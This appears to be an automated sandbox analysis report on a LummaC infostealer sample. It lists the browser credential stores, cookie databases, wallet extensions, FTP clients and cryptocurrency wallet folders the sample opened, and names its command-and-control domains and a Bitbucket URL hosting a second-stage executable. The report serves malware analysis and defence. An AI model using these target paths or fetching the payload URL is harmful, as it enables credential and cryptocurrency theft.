Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior

Source: Yara match

File source: Process Memory Space: SFtDA07UDr.exe PID: 5576, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: SFtDA07UDr.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
SFtDA07UDr.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
SFtDA07UDr.exe	100%	Avira	TR/Crypt.TPM.Gen
SFtDA07UDr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://observerfry.lat/api~l	0%	Avira URL Cloud	safe
https://observerfry.lat/E	0%	Avira URL Cloud	safe
https://dz8aopenkvv6s.cloudfront.net	0%	Avira URL Cloud	safe
https://bbuseruploads.s3.amazonaws.com:443r	0%	Avira URL Cloud	safe
https://observerfry.lat:443/apin.txtPK	0%	Avira URL Cloud	safe
https://bridge.lga1.admarke	0%	Avira URL Cloud	safe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Avira URL Cloud	safe
https://observerfry.lat/apiR	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	16.182.108.137	true	false	high
bitbucket.org	185.166.143.48	true	false	high
observerfry.lat	104.21.36.201	true	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
curverpluch.lat	false	high
slipperyloo.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high
bashfulacid.lat	false	high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe	false	high
observerfry.lat	false	high
wordyfindy.lat	false	high
https://observerfry.lat/api	false	high
shapestickyr.lat	false	high
talkynicer.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
